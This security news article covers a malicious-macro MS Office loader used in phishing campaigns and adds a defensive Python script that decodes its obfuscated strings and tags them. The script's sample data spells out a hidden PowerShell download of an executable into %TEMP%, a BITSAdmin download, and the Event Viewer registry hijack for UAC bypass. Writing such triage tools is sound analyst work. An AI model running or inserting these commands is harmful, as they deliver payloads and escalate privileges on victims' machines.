Security researchers at Palo Alto Networks have recently discovered a Microsoft Office loader that uses malicious macros to drop multiple malware families. The loader was first detected in early December 2016 and, since then, the researchers have found more than 650 unique samples, accounting for roughly 12,000 attacks against several industries.
The loader is distributed via email and relies on heavily obfuscated malicious macros together with a user account control (UAC) bypass technique. The roughly 12,000 phishing emails carry varied subject lines such as quotation requests, purchase orders, email verification notices and purchase inquiries. The attached documents likewise pose as legitimate files, claiming to be deposit slips, document scans, invoices and product lists, among others.
Palo Alto Networks states that the most affected industries are Government, High-Tech, and Professional and Legal Services, while Telecoms, Services and Wholesale have also been targeted by this loader.
Ancalog, Bartalex, DarkComet, KeyBase, Pony, LuminosityLink and PredatorPain are among the malware families dropped by this MS Office loader.
“Based on the large amount of commodity malware families being dropped, as well as the wide distribution seen, this loader appears to primarily be used for widespread campaigns.” – the security researchers say.
According to the researchers, the malicious macros used by the loader were generated with a builder: they are highly obfuscated, use randomly chosen variable names and contain a large amount of garbage code.
The second half of each macro consists of garbage code, obfuscated strings and a number of strings that are written to the Word document as decoy content. These decoy strings match the ploy used by the attacker, based on the subject line and the filename, and the researchers note that only about 50% of the samples contained such decoy information.
The first half of the macro contains a function that decodes the obfuscated strings, which are then passed to a PowerShell command. The decoding routine is trivial: it removes every character that appears in a blacklist string embedded in the macro, and whatever remains is the real string.
One of the decoded strings uses PowerShell to download a payload and save it in the %TEMP% directory. The macro then creates a registry key pointing to that file and abuses the Windows Event Viewer to bypass UAC, so the payload is launched with elevated privileges without a consent prompt. Once it has run, the dropped file is deleted.
The Event Viewer UAC bypass technique was first publicly documented in August 2016 and has since been used in a variety of malicious campaigns, including some that distributed ransomware. Like most UAC bypasses, it only helps the attacker when the victim is already a member of the local Administrators group; a standard user account is not affected.
Not all samples use PowerShell: in 11 of them the attackers relied on the built-in BITSAdmin tool to download the malware instead.
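The decoding step described above (strip every character found in a per-sample blacklist) is simple enough to emulate outside the macro, which is the first thing an analyst does when triaging one of these documents. The following Python script is an added example, not code from the original article or from Palo Alto Networks: it reproduces the blacklist-removal decoder, generates constructed obfuscated samples with a matching builder-side routine so it can run offline, and then tags each decoded string with the stages the article describes (download via PowerShell or BITSAdmin, drop to %TEMP%, Event Viewer UAC bypass). The blacklist, the sample command lines, the hostname and the triage rules are all made up for this example; the mscfile registry path in the rules is the well-known handler key the Event Viewer bypass hijacks, not something taken from the article.

```python
"""Emulate the macro's blacklist-removal string decoder and triage the result.

Everything here is constructed for illustration: the blacklist, the sample
commands and the triage rules are not taken from a real sample.
"""
import random
import re

# Constructed blacklist of junk characters. Real samples embed a random,
# per-sample blacklist string in the macro; none of its characters may occur
# in the real strings, otherwise decoding would corrupt them.
BLACKLIST = "#@~^"

# Constructed decoded strings, modelled on the behaviour the article describes.
SAMPLE_COMMANDS = [
    "powershell -w hidden -c (New-Object Net.WebClient).DownloadFile("
    "'http://example.invalid/p.exe', $env:TEMP + '\\p.exe')",
    "bitsadmin /transfer job /download /priority high "
    "http://example.invalid/p.exe %TEMP%\\p.exe",
    "reg add HKCU\\Software\\Classes\\mscfile\\shell\\open\\command "
    "/ve /d %TEMP%\\p.exe /f && eventvwr.exe",
]


def obfuscate(plain: str, blacklist: str = BLACKLIST, seed: int = 1) -> str:
    """Builder side: interleave junk characters from the blacklist into a string."""
    if any(ch in blacklist for ch in plain):
        raise ValueError("blacklist characters must not occur in the plaintext")
    rng = random.Random(seed)  # fixed seed keeps the sample reproducible
    out = []
    for ch in plain:
        # insert between 0 and 3 junk characters before every real character
        out.append("".join(rng.choice(blacklist) for _ in range(rng.randint(0, 3))))
        out.append(ch)
    return "".join(out)


def decode(obfuscated: str, blacklist: str = BLACKLIST) -> str:
    """Macro side: drop every character that appears in the blacklist."""
    drop = set(blacklist)
    return "".join(ch for ch in obfuscated if ch not in drop)


# Constructed triage rules: tag -> case-insensitive regex over the decoded string.
RULES = {
    "download_powershell": r"Net\.WebClient|DownloadFile|DownloadString|Invoke-WebRequest",
    "download_bitsadmin": r"\bbitsadmin(\.exe)?\b.*/transfer",
    "drop_to_temp": r"%TEMP%|\$env:TEMP",
    # The Event Viewer UAC bypass plants a handler for .msc files under HKCU so
    # that eventvwr.exe, which auto-elevates, launches the attacker's file.
    "uac_bypass_eventvwr": r"Software\\Classes\\mscfile\\shell\\open\\command|\beventvwr(\.exe)?\b",
    "hidden_window": r"-w(indowstyle)?\s+hidden",
}


def triage(decoded: str) -> set:
    """Return the set of tags whose pattern matches the decoded string."""
    return {tag for tag, pat in RULES.items() if re.search(pat, decoded, re.IGNORECASE)}


def analyse_macro_strings(obfuscated_strings, blacklist: str = BLACKLIST):
    """Decode each string and pair it with its triage tags."""
    results = []
    for blob in obfuscated_strings:
        decoded = decode(blob, blacklist)
        results.append((decoded, triage(decoded)))
    return results


if __name__ == "__main__":
    blobs = [obfuscate(cmd) for cmd in SAMPLE_COMMANDS]
    for decoded, tags in analyse_macro_strings(blobs):
        print(sorted(tags), "<-", decoded[:72])
```

When working on a real document, extract the macro with a tool such as olevba, copy the blacklist string the decoder function references into `BLACKLIST`, and feed the obfuscated literals to `analyse_macro_strings`; the triage tags are only a starting point and should be extended with whatever the decoded commands actually reference.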
“Overall, this new loader is interesting in its use of performing a UAC bypass. Additionally, the widespread use of this loader since December of last year shows that it is being used in numerous campaigns. It is unclear if this loader is being used by one or more groups. Multiple industries have been targeted by this loader, which has been used to deploy multiple malware families.” – Palo Alto researchers conclude.